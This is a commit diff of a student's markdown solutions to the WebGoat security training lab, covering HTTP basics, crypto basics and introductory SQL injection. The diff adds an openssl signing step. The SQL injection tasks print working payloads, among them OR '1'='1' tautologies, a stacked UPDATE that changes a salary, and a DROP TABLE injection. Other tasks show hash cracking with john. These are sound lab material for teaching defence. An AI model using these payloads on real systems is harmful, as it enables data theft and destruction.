md/WebGoat.md, before:

---
title: "Design Sicherer Systeme - Labor Lösungen"
author: [Thomas Gingele]
date: "2023-10-09"
---

I would like to metion that I will be using **Burpsuite** instead of **OWASP ZAProxy**
for the majority of the tasks. Please feel free to follow the tutorials provided by
WebGoat if you are not comfortable with this tool.

# Registered User:

```
leastsignificantbit:password
```

# Introduction

## WebGoat

### Task 1

No answer needed.

## WebWolf

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

Type in your e-mail address below and check your inbox in WebWolf. Then type in the unique code from the e-mail in the field below.

How to access the Mailbox:

1. Go to `http://localhost/WebWolf/login`.
2. Log in with your WebGoat credentials.
3. Navigate to "MailBox" in the top toolbar.

Go back to Web**Goat** and enter an email with the following pattern:

```
Pattern: <username>@<doesn't matter>
Example: leastsignificantbit@canliterallybeanything.lmao
```

Go back to the mailbox and copy the code from the received email.
The code for the above email is:

```
tibtnacifingistsael
```

### Task 4

This task seems to be optional.
The answer is the same code from *Task 3*.

Just click on the link and enter any password.
Alternatively, visit the following URL manually:

```
http://localhost:8080/WebGoat/WebWolf/landing/password-reset
```

# General

## HTTP Basics

### Task 1

No answer needed.

### Task 2

It does not matter what is input here.
Type anything and press the button.

### Task 4

What type of HTTP command did WebGoat use for this lesson. A POST or a GET.

```
Was the HTTP command a POST or a GET: POST
What is the magic number            : 97
```

## HTTP Proxies

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

No answer needed.

### Task 4

No answer needed.

### Task 5

No answer needed.

### Task 6

```text
GET /WebGoat/HttpProxies/intercept-request?changeMe=Requests%20are%20tampered%20easily HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */ *
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 15
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/WebGoat/start.mvc
Cookie: JSESSIONID=e3dHiM5wF8CB2DJW6Sb_K1NAYbCAcl3W8PONY_oD; WEBWOLFSESSION=YR6BTRUQH_89HzCbp9q68HiWVQGdYCgWyDWVW7UL
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
x-request-intercepted:true
```

### Task 7

No answer needed for the task.

### Task 8

No answer needed.

### Task 9

No answer needed.

### Task 10

No answer needed.

## Developer Tools

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

No answer needed.

### Task 4

Use the console in the dev tools and call the javascript function webgoat.customjs.phoneHome().

The answer for this question is randomly generated each time the function is called.
Simply open your browsers developer console and run it to receive the result.

![Developer Tools Task 4](./.img/dev_tools_t4.png)

### Task 5

No answer needed.

### Task 6

In this assignment you need to find a specific HTTP request and read a randomized number from it.

Open the "Network" tab in your browsers developer tools and take a look at the request
body of the request. Note, that this answer is also randomly generated each time the request is send.

![Developer Tools Task 6](./.img/dev_tools_t6.png)

## CIA Triad

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

No answer needed.

### Task 4

No answer needed.

### Task 5

1. *How could an intruder harm the security goal of confidentiality?*

Solution 3: By stealing a database where names and emails are stored and uploading it to a website.

2. *How could an intruder harm the security goal of integrity?*

Solution 1: By changing the names and emails of one or more users stored in a database.

3. *How could an intruder harm the security goal of availability?*

Solution 4: By launching a denial of service attack on the servers.

4. *What happens if at least one of the CIA security goals is harmed?*

Solution 2: The system's security is compromised even if only one goal is harmed.

## Crypto Basics

### Task 1

No answer needed.

### Task 2

If you have no Linux terminal available, you can decode the string here: [CyberChef - Github.io](https://gchq.github.io/CyberChef/)

Otherwise, you can use the following command:

```bash
echo "bGVhc3RzaWduaWZpY2FudGJpdDpwYXNzd29yZA==" | base64 -d
```

The answer will be the credentials of the logged in user.
For this example the string will decode to:

```text
leastsignificantbit:password
```

HTTP Basic Authentication uses Base64 encoding to transfer a clients credentials
through a request header called `Authorization`.
This header contains the credentials in the following format:

```text
<username>:<password>
```

This is then encoded and prepended with the string "Basic" to let the server know what type of
authorization is used. A full header would look like this:

```text
Authorization: Basic eW91d2lzaHRoaXN3YXNteXBhc3N3b3JkOmJ1dG5vcGUK
```

### Task 3

The following string needs to be decoded:

```text
{xor}Oz4rPj0+LDovPiwsKDAtOw==
```

Apart from the `{xor}`, this seems to be encoded with `base64`.
Using the command from *Task 2*, it decodes to:

```text
;>+>=>,:/>,,(0-;
```

The `{xor}` may be a hint to how this string is encoded.
It is possible to brute force XOR encoded strings using [CyberChef - Github.io](https://gchq.github.io/CyberChef/).

The string decodes to:

```text
databasepassword
```

![Crypto Basics Task 3](./.img/crypt_basics_t3.png)

### Task 4

The easiest solution is to use a hash database to simply look up what tha original text is.
In this case, [Crackstation.net](https://crackstation.net/) was used.

![Crypto Basics Task 4](./.img/crypt_basics_t4.png)

Alternatively, the tool `john` can be used to crack the hash locally.

```bash
echo "21232F297A57A5A743894A0E4A801FC3" > hash_1
john hash_1 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5

echo "5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8" > hash_2
john hash_2 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256
```

The hashes should decode to the following two words:

```text
admin
password
```

### Task 5

No asnwer needed.

# (A1) Injection

## SQL Injection (intro)

### Task 1

No answer needed.

### Task 2

Look at the example table. Try to retrieve the department of the employee Bob Franco. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.

```sql
SELECT department FROM employees WHERE userid = 96134
```

### Task 3

Try to change the department of Tobi Barnett to 'Sales'. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.

```sql
UPDATE employees SET department='Sales' WHERE userid = 89762
```

### Task 4

Try to modify the schema by adding the column "phone" (varchar(20)) to the table "employees".

```sql
ALTER TABLE employees ADD phone varchar(20)
```

### Task 5

Try to grant rights to the table `grant_rights` to user `unauthorized_user`.

```sql
GRANT SELECT ON grant_rights TO unauthorized_user
```

### Task 6

No answer needed.

### Task 7

No answer needed.

### Task 8

No answer needed.

### Task 9

Try using the form below to retrieve all the users from the users table. You should not need to know any specific user name to get the complete list.

```sql
SELECT * FROM user_data WHERE first_name = 'Smith' OR '1' = '1'
```

### Task 10

Using the two Input Fields below, try to retrieve all the data from the users table.

```sql
Login_Count: 0
User_Id    : 0 OR 1=1
```

### Task 11

Use the form below and try to retrieve all employee data from the employees table.

```sql
Employee Name     : Bit
Authentication TAN: 0' OR '1'='1
```

### Task 12

Change your own salary so you are earning the most.

```sql
Employee Name     : Smith
Authentication TAN: 3SL99A'; UPDATE employees SET salary='99999999' WHERE userid = '37648
```

### Task 13

Delete the `access_log` table.

```sql
"'; DROP TABLE access_log -- -
```

Commit message:

Almost done with lab one, only TODOs left

md/WebGoat.md, after:

---
title: "Design Sicherer Systeme - Labor Lösungen"
author: [Thomas Gingele]
date: "2023-10-09"
---

I would like to metion that I will be using **Burpsuite** instead of **OWASP ZAProxy**
for the majority of the tasks. Please feel free to follow the tutorials provided by
WebGoat if you are not comfortable with this tool.

# Registered User:

```
leastsignificantbit:password
```

# Introduction

## WebGoat

### Task 1

No answer needed.

## WebWolf

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

Type in your e-mail address below and check your inbox in WebWolf. Then type in the unique code from the e-mail in the field below.

How to access the Mailbox:

1. Go to `http://localhost/WebWolf/login`.
2. Log in with your WebGoat credentials.
3. Navigate to "MailBox" in the top toolbar.

Go back to Web**Goat** and enter an email with the following pattern:

```
Pattern: <username>@<doesn't matter>
Example: leastsignificantbit@canliterallybeanything.lmao
```

Go back to the mailbox and copy the code from the received email.
The code for the above email is:

```
tibtnacifingistsael
```

### Task 4

This task seems to be optional.
The answer is the same code from *Task 3*.

Just click on the link and enter any password.
Alternatively, visit the following URL manually:

```
http://localhost:8080/WebGoat/WebWolf/landing/password-reset
```

# General

## HTTP Basics

### Task 1

No answer needed.

### Task 2

It does not matter what is input here.
Type anything and press the button.

### Task 4

What type of HTTP command did WebGoat use for this lesson. A POST or a GET.

```
Was the HTTP command a POST or a GET: POST
What is the magic number            : 97
```

## HTTP Proxies

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

No answer needed.

### Task 4

No answer needed.

### Task 5

No answer needed.

### Task 6

```text
GET /WebGoat/HttpProxies/intercept-request?changeMe=Requests%20are%20tampered%20easily HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */ *
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 15
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/WebGoat/start.mvc
Cookie: JSESSIONID=e3dHiM5wF8CB2DJW6Sb_K1NAYbCAcl3W8PONY_oD; WEBWOLFSESSION=YR6BTRUQH_89HzCbp9q68HiWVQGdYCgWyDWVW7UL
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
x-request-intercepted:true
```

### Task 7

No answer needed for the task.

### Task 8

No answer needed.

### Task 9

No answer needed.

### Task 10

No answer needed.

## Developer Tools

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

No answer needed.

### Task 4

Use the console in the dev tools and call the javascript function webgoat.customjs.phoneHome().

The answer for this question is randomly generated each time the function is called.
Simply open your browsers developer console and run it to receive the result.

![Developer Tools Task 4](./.img/dev_tools_t4.png)

### Task 5

No answer needed.

### Task 6

In this assignment you need to find a specific HTTP request and read a randomized number from it.

Open the "Network" tab in your browsers developer tools and take a look at the request
body of the request. Note, that this answer is also randomly generated each time the request is send.

![Developer Tools Task 6](./.img/dev_tools_t6.png)

## CIA Triad

### Task 1

No answer needed.

### Task 2

No answer needed.

### Task 3

No answer needed.

### Task 4

No answer needed.

### Task 5

1. *How could an intruder harm the security goal of confidentiality?*

Solution 3: By stealing a database where names and emails are stored and uploading it to a website.

2. *How could an intruder harm the security goal of integrity?*

Solution 1: By changing the names and emails of one or more users stored in a database.

3. *How could an intruder harm the security goal of availability?*

Solution 4: By launching a denial of service attack on the servers.

4. *What happens if at least one of the CIA security goals is harmed?*

Solution 2: The system's security is compromised even if only one goal is harmed.

## Crypto Basics

### Task 1

No answer needed.

### Task 2

If you have no Linux terminal available, you can decode the string here: [CyberChef - Github.io](https://gchq.github.io/CyberChef/)

Otherwise, you can use the following command:

```bash
echo "bGVhc3RzaWduaWZpY2FudGJpdDpwYXNzd29yZA==" | base64 -d
```

The answer will be the credentials of the logged in user.
For this example the string will decode to:

```text
leastsignificantbit:password
```

HTTP Basic Authentication uses Base64 encoding to transfer a clients credentials
through a request header called `Authorization`.
This header contains the credentials in the following format:

```text
<username>:<password>
```

This is then encoded and prepended with the string "Basic" to let the server know what type of
authorization is used. A full header would look like this:

```text
Authorization: Basic eW91d2lzaHRoaXN3YXNteXBhc3N3b3JkOmJ1dG5vcGUK
```

### Task 3

The following string needs to be decoded:

```text
{xor}Oz4rPj0+LDovPiwsKDAtOw==
```

Apart from the `{xor}`, this seems to be encoded with `base64`.
Using the command from *Task 2*, it decodes to:

```text
;>+>=>,:/>,,(0-;
```

The `{xor}` may be a hint to how this string is encoded.
It is possible to brute force XOR encoded strings using [CyberChef - Github.io](https://gchq.github.io/CyberChef/).

The string decodes to:

```text
databasepassword
```

![Crypto Basics Task 3](./.img/crypt_basics_t3.png)

### Task 4

The easiest solution is to use a hash database to simply look up what tha original text is.
In this case, [Crackstation.net](https://crackstation.net/) was used.

![Crypto Basics Task 4](./.img/crypt_basics_t4.png)

Alternatively, the tool `john` can be used to crack the hash locally.

```bash
echo "21232F297A57A5A743894A0E4A801FC3" > hash_1
john hash_1 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5

echo "5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8" > hash_2
john hash_2 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256
```

The hashes should decode to the following two words:

```text
admin
password
```

### Task 5

No asnwer needed.

### Task 6

The modulus can be read from the private key file like this:

```bash
openssl rsa -in myprivate.pem -noout -modulus 
```

To sign this string, I came up with this fancy oneliner:

```bash
openssl rsa -in myprivate.pem -noout -modulus | cut -d '=' -f 2 | tr -d '\n' | openssl dgst -sha256 -sign myprivate.pem | base64
```

# (A1) Injection

## SQL Injection (intro)

### Task 1

No answer needed.

### Task 2

Look at the example table. Try to retrieve the department of the employee Bob Franco. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.

```sql
SELECT department FROM employees WHERE userid = 96134
```

### Task 3

Try to change the department of Tobi Barnett to 'Sales'. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.

```sql
UPDATE employees SET department='Sales' WHERE userid = 89762
```

### Task 4

Try to modify the schema by adding the column "phone" (varchar(20)) to the table "employees".

```sql
ALTER TABLE employees ADD phone varchar(20)
```

### Task 5

Try to grant rights to the table `grant_rights` to user `unauthorized_user`.

```sql
GRANT SELECT ON grant_rights TO unauthorized_user
```

### Task 6

No answer needed.

### Task 7

No answer needed.

### Task 8

No answer needed.

### Task 9

Try using the form below to retrieve all the users from the users table. You should not need to know any specific user name to get the complete list.

```sql
SELECT * FROM user_data WHERE first_name = 'Smith' OR '1' = '1'
```

### Task 10

Using the two Input Fields below, try to retrieve all the data from the users table.

```sql
Login_Count: 0
User_Id    : 0 OR 1=1
```

### Task 11

Use the form below and try to retrieve all employee data from the employees table.

```sql
Employee Name     : Bit
Authentication TAN: 0' OR '1'='1
```

### Task 12

Change your own salary so you are earning the most.

```sql
Employee Name     : Smith
Authentication TAN: 3SL99A'; UPDATE employees SET salary='99999999' WHERE userid = '37648
```

### Task 13

Delete the `access_log` table.

```sql
"'; DROP TABLE access_log -- -
```
